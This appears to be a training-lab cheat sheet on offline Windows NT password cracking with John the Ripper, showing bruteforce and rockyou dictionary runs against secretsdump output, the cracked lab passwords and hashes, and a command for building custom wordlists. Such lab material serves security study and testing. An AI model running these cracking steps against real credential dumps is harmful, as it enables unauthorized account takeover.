=========================================================================
Basic offline password cracking using John 
=========================================================================

1. Basic password bruteforce attack
------------------------------------
jeff@kali-Linux:~/Documents/Windows-training$ sudo john /home/jeff/Documents/Windows-training/Secretsdump-Output.txt --format=NT
Using default input encoding: UTF-8
Loaded 4 password hashes with no different salts (NT [MD4 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
                 (Guest)
Test123          (backup)


2. Basic password dictionnary attack
-------------------------------------
jeff@kali-Linux:~/Documents/Windows-training$ sudo john /home/jeff/Documents/Windows-training/John-pwd-to-crack.txt -format=NT --wordlist=/usr/share/wordlists/rockyou.txt --rules=all --fork=4
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 128/128 SSE2 4x3])
Remaining 1 password hash
Node numbers 1-4 of 4 (fork)
Each node loaded 1/4 of wordfile to memory (about 33 MB/node)
Press 'q' or Ctrl-C to abort, almost any other key for status
 
password321!     (user)

1 1g 0:00:01:56 DONE (2020-03-22 18:12) 0.008577g/s 1290Kp/s 1290Kc/s 1290KC/s tweety25!..nicotina!
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed


jeff@kali-Linux:~/Documents/Windows-training$ sudo john /home/jeff/Documents/Windows-training/John-pwd-to-crack.txt -format=NT --show
backup:Test123:1008:aad3b435b51404eeaad3b435b51404ee:3b1da22b1973c0bb86d4a9b6a9ae65f6:::
user:password321!:1012:aad3b435b51404eeaad3b435b51404ee:1f61eda7f8ad3a28e52caa19e2e947e1:::


3. How to simply generate a customized password dictionnary with 'John'
---------------------------------------------------------------------------
$ sudo john -wordlist:/<path>/list-of-possible-passwords.txt -rules -stdout > New-password-dictionnary.txt

